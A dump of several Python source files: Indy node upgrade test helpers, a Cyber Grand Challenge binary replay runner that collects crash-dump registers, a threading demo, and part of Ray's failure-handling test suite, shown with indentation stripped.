def sdk_send_upgrade(looper, sdk_pool_handle, sdk_wallet_trustee, upgrade_data):
_, did = sdk_wallet_trustee
req = get_req_from_update(looper, did, upgrade_data)
return sdk_sign_and_send_prepared_request(looper, sdk_wallet_trustee,
sdk_pool_handle, req)
def sdk_ensure_upgrade_sent(looper, sdk_pool_handle,
sdk_wallet_trustee, upgrade_data):
req = sdk_send_upgrade(looper, sdk_pool_handle, sdk_wallet_trustee, upgrade_data)
sdk_get_and_check_replies(looper, [req])
def get_req_from_update(looper, did, nup):
req = looper.loop.run_until_complete(
build_pool_upgrade_request(did, nup['name'], nup['version'], nup['action'], nup['sha256'],
nup['timeout'],
json.dumps(nup['schedule']) if 'schedule' in nup else None,
nup['justification'] if 'justification' in nup else 'null',
nup['reinstall'] if 'reinstall' in nup else None,
nup[FORCE] if FORCE in nup else None,
nup.get('package', None)))
return req
def clear_aq_stash(nodes):
for node in nodes:
node.upgrader.aqStash.clear()
def checkUpgradeScheduled(nodes, version: str, schedule=None):
for node in nodes:
assert len(node.upgrader.aqStash) == 1
assert node.upgrader.scheduledAction
assert node.upgrader.scheduledAction.version.full == version
if schedule:
assert node.upgrader.scheduledAction.when == \
dateutil.parser.parse(schedule[node.id])
def checkNoUpgradeScheduled(nodes):
for node in nodes:
assert len(node.upgrader.aqStash) == 0
assert node.upgrader.scheduledAction is None
def codeVersionInfo():
return indy_node.__version_info__.parts
def releaseVersion():
return '.'.join(map(str, codeVersionInfo()[:3]))
def bumpVersion(v):
parts = v.split('.')
return '.'.join(parts[:-1] + [str(int(parts[-1]) + 1)])
def lowerVersion(v):
parts = v.split('.')
for i in reversed(range(len(parts))):
if int(parts[i]) > 0:
parts[i] = str(int(parts[i]) - 1)
break
else:
raise ValueError('Version {} cannot be lowered'.format(v))
return '.'.join(parts)
def bumpedVersion(ver=None):
return bumpVersion(ver or releaseVersion())
def loweredVersion():
return lowerVersion(releaseVersion())
class NodeControlToolExecutor:
def __init__(self, backup_dir, backup_target, transform=lambda tool: None):
self.tool = NodeControlTool(backup_dir=backup_dir, backup_target=backup_target)
transform(self.tool)
self.p = multiprocessing.Process(target=self.tool.start)
self.p.start()
logger.debug("NCTProcess was started with pid: {}".format(self.p.pid))
def stop(self):
logger.debug("Send stop to NCTProcess with pid: {}".format(self.p.pid))
self.tool.server.close()
self.p.terminate()
# check that process with NodeControlTool.start function really stop.
# process.terminate() just send SIGTERM and is not guarantee that process stops
if self.p.is_alive():
logger.debug("NCTProcess still alive, with pid: {}".format(self.p.pid))
# while process is still alive, join with main process and wait
# FIXME: here was self.p.join(3), but since we've added (ok, Andrew Nikitin
# has added) handler for SIGTERM here we wait for child process infinitely,
# but for now we have no time to fix it in more elegant way as it is not a
# real situation (Andrew said), so he has proposed this ugly hack.
os.kill(self.p.pid, 9)
logger.debug("NCTProcess must be stopped, with pid: {}".format(self.p.pid))
def composeUpgradeMessage(version, pkg_name: str = APP_NAME):
return (json.dumps({"version": version, "pkg_name": pkg_name, MESSAGE_TYPE: UPGRADE_MESSAGE})).encode()
def sendUpgradeMessage(version, pkg_name: str = APP_NAME):
sock = socket.create_connection(
(controlServiceHost, controlServicePort))
sock.sendall(composeUpgradeMessage(version, pkg_name=pkg_name))
sock.close()
def nodeControlGeneralMonkeypatching(tool, monkeypatch, tdir, stdout):
ret = type("", (), {})()
ret.returncode = 0
ret.stdout = stdout if isinstance(stdout, bytes) else stdout.encode()
tool.base_dir = tdir
tool.indy_dir = os.path.join(tool.base_dir, '.indy')
tool.tmp_dir = os.path.join(tool.base_dir, '.indy_tmp')
if not os.path.exists(tool.indy_dir):
os.mkdir(tool.indy_dir)
if not os.path.exists(tool.tmp_dir):
os.mkdir(tool.tmp_dir)
monkeypatch.setattr(subprocess, 'run', lambda *x, **y: ret)
monkeypatch.setattr(tool, '_do_migration', lambda *x: None)
def get_valid_code_hash():
return randomString(64)
def populate_log_with_upgrade_events(
pool_txn_node_names, tdir, tconf, version: Tuple[str, str, str], pkg_name: str = APP_NAME):
for nm in pool_txn_node_names:
config_helper = NodeConfigHelper(nm, tconf, chroot=tdir)
ledger_dir = config_helper.ledger_dir
os.makedirs(ledger_dir)
log = UpgradeLog(os.path.join(ledger_dir, tconf.upgradeLogFile))
when = datetime.utcnow().replace(tzinfo=dateutil.tz.tzutc())
ev_data = UpgradeLogData(when, version, randomString(10), pkg_name)
log.append_scheduled(ev_data)
log.append_started(ev_data)
def check_node_sent_acknowledges_upgrade(
looper, node_set, node_ids, allowed_actions: List, ledger_size, expected_version):
'''
Check that each node has sent NODE_UPGRADE txn with the specified actions
'''
check = functools.partial(
check_ledger_after_upgrade,
node_set,
allowed_actions,
ledger_size,
expected_version,
node_ids=node_ids)
timeout = plenumWaits.expectedTransactionExecutionTime(len(node_set))
looper.run(
eventually(
check,
retryWait=1,
timeout=timeout))
def emulate_restart_pool_for_upgrade(nodes):
for node in nodes:
node.upgrader = node.init_upgrader()
node.acknowledge_upgrade()
def emulate_view_change_pool_for_upgrade(nodes):
for node in nodes:
node.upgrader.processLedger()
node.acknowledge_upgrade()
def check_node_do_not_sent_acknowledges_upgrade(
looper, node_set, node_ids, allowed_actions: List, ledger_size, expected_version):
'''
Check that each node has sent NODE_UPGRADE txn with the specified actions
'''
looper.runFor(5)
check_ledger_after_upgrade(node_set, allowed_actions,
ledger_size, expected_version,
node_ids=node_ids)
def clear_config_ledger(node_set):
for node in node_set:
node.configLedger.reset_uncommitted()
node.configLedger._transactionLog.reset()
node.configLedger.tree.reset()
def check_ledger_after_upgrade(
node_set,
allowed_actions,
ledger_size,
expected_version,
allowed_txn_types=[NODE_UPGRADE],
node_ids=None):
versions = set()
for node in node_set:
print(len(node.configLedger))
assert len(node.configLedger) == ledger_size
ids = set()
for _, txn in node.configLedger.getAllTxn():
type = get_type(txn)
assert type in allowed_txn_types
txn_data = get_payload_data(txn)
data = txn_data
if type == NODE_UPGRADE:
data = txn_data[DATA]
assert data[ACTION]
assert data[ACTION] in allowed_actions
ids.add(get_from(txn))
assert data[VERSION]
versions.add(data[VERSION])
ids.add(node.id)
if node_ids:
assert ids == set(node_ids)
assert len(versions) == 1
assert list(versions)[0] == expected_version
def check_no_loop(nodeSet, ev_type, pkg_name: str = APP_NAME):
for node in nodeSet:
# mimicking upgrade start
node.upgrader._actionLog.append_started(
UpgradeLogData(
datetime.utcnow().replace(tzinfo=dateutil.tz.tzutc()),
node.upgrader.scheduledAction.version,
node.upgrader.scheduledAction.upgrade_id,
pkg_name
)
)
node.notify_upgrade_start()
# mimicking upgrader's initialization after restart
node.upgrader.process_action_log_for_first_run()
node.upgrader.scheduledAction = None
assert node.upgrader._actionLog.last_event.ev_type == ev_type
# mimicking node's catchup after restart
node.postConfigLedgerCaughtUp()
assert node.upgrader.scheduledAction is None
assert node.upgrader._actionLog.last_event.ev_type == ev_type
def sdk_change_bls_key(looper, txnPoolNodeSet,
node,
sdk_pool_handle,
sdk_wallet_steward,
add_wrong=False,
new_bls=None,
new_key_proof=None):
if add_wrong:
_, new_blspk, key_proof = create_default_bls_crypto_factory().generate_bls_keys()
else:
new_blspk, key_proof = init_bls_keys(node.keys_dir, node.name)
key_in_txn = new_bls or new_blspk
bls_key_proof = new_key_proof or key_proof
node_dest = hexToFriendly(node.nodestack.verhex)
sdk_send_update_node(looper, sdk_wallet_steward,
sdk_pool_handle,
node_dest, node.name,
None, None,
None, None,
bls_key=key_in_txn,
services=None,
key_proof=bls_key_proof)
poolSetExceptOne = list(txnPoolNodeSet)
poolSetExceptOne.remove(node)
waitNodeDataEquality(looper, node, *poolSetExceptOne)
sdk_pool_refresh(looper, sdk_pool_handle)
sdk_add_new_nym(looper, sdk_pool_handle, sdk_wallet_steward,
alias=randomString(5))
ensure_all_nodes_have_same_data(looper, txnPoolNodeSet)
return new_blspk
def count_action_log_entries(upg_log, func):
ret = 0
for upg_rec in upg_log:
if func(upg_rec):
ret += 1
return ret
def count_action_log_package(upg_log, pkg_name):
return count_action_log_entries(upg_log, lambda entry: entry.data.pkg_name == pkg_name)
|
challenge_runner.py | #!/usr/bin/env python2
import os
import re
import signal
import subprocess as sp
from time import time, sleep
import threading
from common import IS_DARWIN, IS_LINUX, IS_WINDOWS, try_delete
# Path to crash dumps in windows
if IS_WINDOWS:
# NOTE: These may need to be changed depending on your setup
DUMP_DIR = os.path.join(os.path.expandvars('%LOCALAPPDATA%'), 'CrashDumps')
CDB_PATH = 'C:/Program Files (x86)/Windows Kits/10/Debuggers/x64/cdb.exe'
def run(challenges, timeout, seed, logfunc):
""" Challenge launcher for replay services
This will setup fds for all challenges according to:
https://github.com/CyberGrandChallenge/cgc-release-documentation/blob/master/newsletter/ipc.md
Args:
challenges (list): List of absolute paths to all challenges to launch
timeout (int): Maximum time in seconds a challenge is allowed to run for
seed (str): Hex encoded seed for libcgc random
logfunc ((str) -> None): Replayer log function used for reporting results
Returns:
(list): all processes that were started
"""
cb_env = {'seed': seed} # Environment variables for all challenges
# This is the first fd after all of the challenges
last_fd = 2 * len(challenges) + 3
# Create all challenge fds
if len(challenges) > 1:
# Close fds where the pipes will be placed
os.closerange(3, last_fd)
new_fd = 3 # stderr + 1
for i in xrange(len(challenges)):
# Create a pipe for every running binary
rpipe, wpipe = os.pipe()
# The write end of the pipe needs to be at the lower fd, so it *may* get dup'd over the read end
# Preemptively dup the read fd here to avoid the issue
rpipe_tmp = os.dup(rpipe)
pipe_fds = [wpipe, rpipe_tmp]
# Duplicate the pipe ends to the correct fds if needed
for fd in pipe_fds:
if fd != new_fd:
os.dup2(fd, new_fd)
new_fd += 1
# Done with the temporary dup
os.close(rpipe_tmp)
# None of the above file descriptors will actually be inherited on Windows
# Prepare the environment so libcgc can regenerate this setup
# with the inherited HANDLEs
if IS_WINDOWS:
import msvcrt
# Store the number of pipes that need to be set up
numpipes = len(challenges) * 2 # Pipe pair for each
cb_env['PIPE_COUNT'] = str(numpipes)
# Store the HANDLE for each of the pipes
for i in xrange(len(challenges) * 2):
cb_env['PIPE_{}'.format(i)] = str(msvcrt.get_osfhandle(3 + i)) # First pipe is at 3
# Start all challenges
# Launch the main binary first
mainchal, otherchals = challenges[0], challenges[1:]
procs = [sp.Popen(mainchal, env=cb_env, stdin=sp.PIPE,
stdout=sp.PIPE, stderr=sp.PIPE)]
# Any others should be launched with the same std i/o pipes
# as the main binary
if len(otherchals) > 0:
main = procs[0]
procs += [sp.Popen(c, env=cb_env, stdin=main.stdin,
stdout=main.stdout, stderr=main.stderr) for c in otherchals]
# Start a watcher to report results when the challenges exit
watcher = threading.Thread(target=chal_watcher, args=(challenges, procs, timeout, logfunc))
watcher.setDaemon(True)
watcher.start()
return procs, watcher
def chal_watcher(paths, procs, timeout, log):
# Continue until any of the processes die
# Wait until any process exits
start = time()
while time() - start < timeout \
and all(proc.poll() is None for proc in procs):
sleep(0.1)
# Give the others a chance to exit
while time() - start < timeout \
and any(proc.poll() is None for proc in procs):
sleep(0.1)
# Kill any remaining processes
for proc in procs:
if proc.poll() is None:
proc.terminate()
proc.wait()
# Close all of the ipc pipes
if len(procs) > 1:
last_fd = 2 * len(procs) + 3
os.closerange(3, last_fd)
# If any of the processes crashed, print out crash info
for path, proc in zip(paths, procs):
pid, sig = proc.pid, abs(proc.returncode)
if sig not in [None, 0, signal.SIGTERM]:
log('[DEBUG] pid: {}, sig: {}'.format(pid, sig))
# Attempt to get register values
regs = get_core_dump_regs(path, pid, log)
if regs is not None:
# If a core dump was generated, report this as a crash
# log('Process generated signal (pid: {}, signal: {}) - {}\n'.format(pid, sig, testpath))
log('Process generated signal (pid: {}, signal: {})'.format(pid, sig))
# Report the register states
reg_str = ' '.join(['{}:{}'.format(reg, val) for reg, val in regs.iteritems()])
log('register states - {}'.format(reg_str))
# Final cleanup
clean_cores(paths, procs)
def get_core_dump_regs(path, pid, log):
""" Read all register values from a core dump
MacOS: all core dumps are stored as /cores/core.[pid]
Linux: the core dump is stored as a 'core' file in the cwd
Windows: If the given registry file was used, core dumps are stored in %LOCALAPPDATA%\CrashDumps
Args:
path (str): path to the executable that generated the dump
pid (int): pid of the process that generated the core dump
log ((str) -> None): logging function used to report information
Returns:
(dict): Registers and their values
"""
# Find the core file
if os.path.exists('/cores/core.{}'.format(pid)):
fn_core = '/cores/core.{}'.format(pid)
if os.path.exists('core.{}'.format(pid)):
fn_core = 'core.{}'.format(pid)
if os.path.exists('core'):
fn_core = 'core'
# Create a gdb/lldb/cdb command to get regs
if IS_DARWIN:
cmd = [
'lldb',
'--core', fn_core,
'--batch', '--one-line', 'register read'
]
elif IS_LINUX:
cmd = [
'gdb',
'--core', fn_core,
'--batch', '-ex', 'info registers'
]
elif IS_WINDOWS:
# Dumps are named "[filename.exe].[pid].dmp"
dmp_name = '{}.{}.dmp'.format(os.path.basename(path), pid)
cmd = [
CDB_PATH,
'-z', os.path.join(DUMP_DIR, dmp_name),
'-c', 'q' # Registers already get printed when the dump is loaded
# quit immediately
]
# Read the registers
dbg_out = '\n'.join(sp.Popen(cmd, stdout=sp.PIPE, stderr=sp.PIPE).communicate())
# Batch commands return successful even if there was an error loading a file
# Check for these strings in the output instead
errs = [
'No such file or directory',
"doesn't exist",
'cannot find the file specified'
]
if any(err in dbg_out for err in errs):
log('Core dump not found, are they enabled on your system?')
return
# Parse out registers/values
regs = {}
if IS_WINDOWS:
for match in re.finditer(r'([a-z]+)=([a-fA-F0-9]+)', dbg_out):
regs[match.group(1)] = match.group(2)
else:
for line in dbg_out.split('\n'):
# Try to match a register value
match = re.search(r'([a-z]+)[=\ ]+0x([a-fA-F0-9]+)', line)
if match is not None:
regs[match.group(1)] = match.group(2)
return regs
def clean_cores(paths, procs):
""" Delete all generated core dumps
Args:
paths (list): paths to all challenges that were launched
procs (list): List of all processes that may have generated core dumps
"""
if IS_DARWIN:
map(try_delete, ['/cores/core.{}'.format(p.pid) for p in procs])
elif IS_LINUX:
try_delete('core')
elif IS_WINDOWS:
for path, proc in zip(paths, procs):
dmp_name = '{}.{}.dmp'.format(os.path.basename(path), proc.pid)
try_delete(os.path.join(DUMP_DIR, dmp_name))
|
daemon.py | # daemon thread setting helps kill the thread after the main thread exits
import logging
import threading
from threading import Thread, Timer
from concurrent.futures import ThreadPoolExecutor
import time
import random
# Test function
def test():
threadname = threading.current_thread().getName()
logging.info(f'Thread starts: id = {threading.get_ident()} name = {threadname}')
for x in range(60):
logging.info('Working')
time.sleep(1)
logging.info(f'Thread ends: id = {threading.get_ident()} name = {threadname}')
def stop():
logging.info('Exiting the Test')
exit(0)
def main():
logging.basicConfig(format='%(levelname)s - %(asctime)s: %(message)s', datefmt='%H:%M:%S', level=logging.DEBUG)
logging.info('Test Starting...')
timer = Timer(3, stop)
timer.start()
t = Thread(target=test, daemon=False)
t.start()
logging.info('Test Finished')
if __name__ == '__main__':
main()
|
test_failure.py | import logging
import os
import sys
import tempfile
import threading
import time
import numpy as np
import pytest
import redis
import ray
import ray.ray_constants as ray_constants
from ray.exceptions import RayTaskError
from ray.cluster_utils import Cluster
from ray.test_utils import (
wait_for_condition,
SignalActor,
init_error_pubsub,
get_error_message,
)
def test_failed_task(ray_start_regular, error_pubsub):
@ray.remote
def throw_exception_fct1():
raise Exception("Test function 1 intentionally failed.")
@ray.remote
def throw_exception_fct2():
raise Exception("Test function 2 intentionally failed.")
@ray.remote(num_returns=3)
def throw_exception_fct3(x):
raise Exception("Test function 3 intentionally failed.")
p = error_pubsub
throw_exception_fct1.remote()
throw_exception_fct1.remote()
msgs = get_error_message(p, 2, ray_constants.TASK_PUSH_ERROR)
assert len(msgs) == 2
for msg in msgs:
assert "Test function 1 intentionally failed." in msg.error_message
x = throw_exception_fct2.remote()
try:
ray.get(x)
except Exception as e:
assert "Test function 2 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
x, y, z = throw_exception_fct3.remote(1.0)
for ref in [x, y, z]:
try:
ray.get(ref)
except Exception as e:
assert "Test function 3 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
class CustomException(ValueError):
pass
@ray.remote
def f():
raise CustomException("This function failed.")
try:
ray.get(f.remote())
except Exception as e:
assert "This function failed." in str(e)
assert isinstance(e, CustomException)
assert isinstance(e, ray.exceptions.RayTaskError)
assert "RayTaskError(CustomException)" in repr(e)
else:
# ray.get should throw an exception.
assert False
def test_get_throws_quickly_when_found_exception(ray_start_regular):
# We use an actor instead of functions here. If we use functions, it's
# very likely that two normal tasks are submitted before the first worker
# is registered to Raylet. Since `maximum_startup_concurrency` is 1,
# the worker pool will wait for the registration of the first worker
# and skip starting new workers. The result is, the two tasks will be
# executed sequentially, which breaks an assumption of this test case -
# the two tasks run in parallel.
@ray.remote
class Actor(object):
def bad_func1(self):
raise Exception("Test function intentionally failed.")
def bad_func2(self):
os._exit(0)
def slow_func(self, signal):
ray.get(signal.wait.remote())
def expect_exception(objects, exception):
with pytest.raises(ray.exceptions.RayError) as err:
ray.get(objects)
assert err.type is exception
signal1 = SignalActor.remote()
actor = Actor.options(max_concurrency=2).remote()
expect_exception(
[actor.bad_func1.remote(),
actor.slow_func.remote(signal1)], ray.exceptions.RayTaskError)
ray.get(signal1.send.remote())
signal2 = SignalActor.remote()
actor = Actor.options(max_concurrency=2).remote()
expect_exception(
[actor.bad_func2.remote(),
actor.slow_func.remote(signal2)], ray.exceptions.RayActorError)
ray.get(signal2.send.remote())
def test_fail_importing_remote_function(ray_start_2_cpus, error_pubsub):
p = error_pubsub
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define a function that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
def g(x, y=3):
try:
module.temporary_python_file()
except Exception:
# This test is not concerned with the error from running this
# function. Only from unpickling the remote function.
pass
# Invoke the function so that the definition is exported.
g.remote(1, y=2)
errors = get_error_message(
p, 2, ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR)
assert errors[0].type == ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR
assert "No module named" in errors[0].error_message
assert "No module named" in errors[1].error_message
# Check that if we try to call the function it throws an exception and
# does not hang.
for _ in range(10):
with pytest.raises(
Exception, match="This function was not imported properly."):
ray.get(g.remote(1, y=2))
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_function_to_run(ray_start_2_cpus, error_pubsub):
p = error_pubsub
def f(worker):
if ray.worker.global_worker.mode == ray.WORKER_MODE:
raise Exception("Function to run failed.")
ray.worker.global_worker.run_function_on_all_workers(f)
# Check that the error message is in the task info.
errors = get_error_message(p, 2, ray_constants.FUNCTION_TO_RUN_PUSH_ERROR)
assert len(errors) == 2
assert errors[0].type == ray_constants.FUNCTION_TO_RUN_PUSH_ERROR
assert "Function to run failed." in errors[0].error_message
assert "Function to run failed." in errors[1].error_message
def test_fail_importing_actor(ray_start_regular, error_pubsub):
p = error_pubsub
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define an actor that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
class Foo:
def __init__(self, arg1, arg2=3):
self.x = module.temporary_python_file()
def get_val(self, arg1, arg2=3):
return 1
# There should be no errors yet.
errors = get_error_message(p, 2)
assert len(errors) == 0
# Create an actor.
foo = Foo.remote(3, arg2=0)
errors = get_error_message(p, 2)
assert len(errors) == 2
for error in errors:
# Wait for the error to arrive.
if error.type == ray_constants.REGISTER_ACTOR_PUSH_ERROR:
assert "No module named" in error.error_message
else:
# Wait for the error from when the __init__ tries to run.
assert ("failed to be imported, and so cannot execute this method"
in error.error_message)
# Check that if we try to get the function it throws an exception and
# does not hang.
with pytest.raises(Exception, match="failed to be imported"):
ray.get(foo.get_val.remote(1, arg2=2))
# Wait for the error from when the call to get_val.
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert ("failed to be imported, and so cannot execute this method" in
errors[0].error_message)
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_actor_init(ray_start_regular, error_pubsub):
p = error_pubsub
error_message1 = "actor constructor failed"
error_message2 = "actor method failed"
@ray.remote
class FailedActor:
def __init__(self):
raise Exception(error_message1)
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed constructor.
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert error_message1 in errors[0].error_message
# Make sure that we get errors from a failed method.
a.fail_method.remote()
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert error_message1 in errors[0].error_message
def test_failed_actor_method(ray_start_regular, error_pubsub):
p = error_pubsub
error_message2 = "actor method failed"
@ray.remote
class FailedActor:
def __init__(self):
pass
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed method.
a.fail_method.remote()
errors = get_error_message(p, 1, ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.TASK_PUSH_ERROR
assert error_message2 in errors[0].error_message
def test_incorrect_method_calls(ray_start_regular):
@ray.remote
class Actor:
def __init__(self, missing_variable_name):
pass
def get_val(self, x):
pass
# Make sure that we get errors if we call the constructor incorrectly.
# Create an actor with too few arguments.
with pytest.raises(Exception):
a = Actor.remote()
# Create an actor with too many arguments.
with pytest.raises(Exception):
a = Actor.remote(1, 2)
# Create an actor the correct number of arguments.
a = Actor.remote(1)
# Call a method with too few arguments.
with pytest.raises(Exception):
a.get_val.remote()
# Call a method with too many arguments.
with pytest.raises(Exception):
a.get_val.remote(1, 2)
# Call a method that doesn't exist.
with pytest.raises(AttributeError):
a.nonexistent_method()
with pytest.raises(AttributeError):
a.nonexistent_method.remote()
def test_worker_raising_exception(ray_start_regular, error_pubsub):
p = error_pubsub
@ray.remote(max_calls=2)
def f():
# This is the only reasonable variable we can set here that makes the
# execute_task function fail after the task got executed.
worker = ray.worker.global_worker
worker.function_actor_manager.increase_task_counter = None
# Running this task should cause the worker to raise an exception after
# the task has successfully completed.
f.remote()
errors = get_error_message(p, 1, ray_constants.WORKER_CRASH_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_CRASH_PUSH_ERROR
def test_worker_dying(ray_start_regular, error_pubsub):
p = error_pubsub
# Define a remote function that will kill the worker that runs it.
@ray.remote(max_retries=0)
def f():
eval("exit()")
with pytest.raises(ray.exceptions.WorkerCrashedError):
ray.get(f.remote())
errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
assert "died or was killed while executing" in errors[0].error_message
def test_actor_worker_dying(ray_start_regular, error_pubsub):
p = error_pubsub
@ray.remote
class Actor:
def kill(self):
eval("exit()")
@ray.remote
def consume(x):
pass
a = Actor.remote()
[obj], _ = ray.wait([a.kill.remote()], timeout=5)
with pytest.raises(ray.exceptions.RayActorError):
ray.get(obj)
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(consume.remote(obj))
errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
def test_actor_worker_dying_future_tasks(ray_start_regular, error_pubsub):
p = error_pubsub
@ray.remote(max_restarts=0)
class Actor:
def getpid(self):
return os.getpid()
def sleep(self):
time.sleep(1)
a = Actor.remote()
pid = ray.get(a.getpid.remote())
tasks1 = [a.sleep.remote() for _ in range(10)]
os.kill(pid, 9)
time.sleep(0.1)
tasks2 = [a.sleep.remote() for _ in range(10)]
for obj in tasks1 + tasks2:
with pytest.raises(Exception):
ray.get(obj)
errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
def test_actor_worker_dying_nothing_in_progress(ray_start_regular):
@ray.remote(max_restarts=0)
class Actor:
def getpid(self):
return os.getpid()
a = Actor.remote()
pid = ray.get(a.getpid.remote())
os.kill(pid, 9)
time.sleep(0.1)
task2 = a.getpid.remote()
with pytest.raises(Exception):
ray.get(task2)
def test_actor_scope_or_intentionally_killed_message(ray_start_regular,
error_pubsub):
p = error_pubsub
@ray.remote
class Actor:
pass
a = Actor.remote()
a = Actor.remote()
a.__ray_terminate__.remote()
time.sleep(1)
errors = get_error_message(p, 1)
assert len(errors) == 0, "Should not have propogated an error - {}".format(
errors)
def test_exception_chain(ray_start_regular):
@ray.remote
def bar():
return 1 / 0
@ray.remote
def foo():
return ray.get(bar.remote())
r = foo.remote()
try:
ray.get(r)
except ZeroDivisionError as ex:
assert isinstance(ex, RayTaskError)
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error1(ray_start_object_store_memory, error_pubsub):
p = error_pubsub
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_arg_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = single_dependency.remote(0, np.zeros(
object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
# are still running, this for-loop should hang and push an error to
# the driver.
ray.get(args[0])
put_arg_task.remote()
# Make sure we receive the correct error message.
errors = get_error_message(p, 1,
ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error2(ray_start_object_store_memory):
# This is the same as the previous test, but it calls ray.put directly.
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = ray.put(np.zeros(object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
# are still running, this for-loop should hang and push an error to
# the driver.
ray.get(args[0])
put_task.remote()
# Make sure we receive the correct error message.
# get_error_message(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)
@pytest.mark.skip("Publish happeds before we subscribe it")
def test_version_mismatch(error_pubsub, shutdown_only):
ray_version = ray.__version__
ray.__version__ = "fake ray version"
ray.init(num_cpus=1)
p = error_pubsub
errors = get_error_message(p, 1, ray_constants.VERSION_MISMATCH_PUSH_ERROR)
assert False, errors
assert len(errors) == 1
assert errors[0].type == ray_constants.VERSION_MISMATCH_PUSH_ERROR
# Reset the version.
ray.__version__ = ray_version
def test_export_large_objects(ray_start_regular, error_pubsub):
p = error_pubsub
import ray.ray_constants as ray_constants
large_object = np.zeros(2 * ray_constants.PICKLE_OBJECT_WARNING_SIZE)
@ray.remote
def f():
large_object
# Invoke the function so that the definition is exported.
f.remote()
# Make sure that a warning is generated.
errors = get_error_message(p, 1,
ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR
@ray.remote
class Foo:
def __init__(self):
large_object
Foo.remote()
# Make sure that a warning is generated.
errors = get_error_message(p, 1,
ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR
@pytest.mark.skip(reason="TODO detect resource deadlock")
def test_warning_for_resource_deadlock(error_pubsub, shutdown_only):
p = error_pubsub
# Check that we get warning messages for infeasible tasks.
ray.init(num_cpus=1)
@ray.remote(num_cpus=1)
class Foo:
def f(self):
return 0
@ray.remote
def f():
# Creating both actors is not possible.
actors = [Foo.remote() for _ in range(2)]
for a in actors:
ray.get(a.f.remote())
# Run in a task to check we handle the blocked task case correctly
f.remote()
errors = get_error_message(p, 1, ray_constants.RESOURCE_DEADLOCK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.RESOURCE_DEADLOCK_ERROR
def test_warning_for_infeasible_tasks(ray_start_regular, error_pubsub):
p = error_pubsub
# Check that we get warning messages for infeasible tasks.
@ray.remote(num_gpus=1)
def f():
pass
@ray.remote(resources={"Custom": 1})
class Foo:
pass
# This task is infeasible.
f.remote()
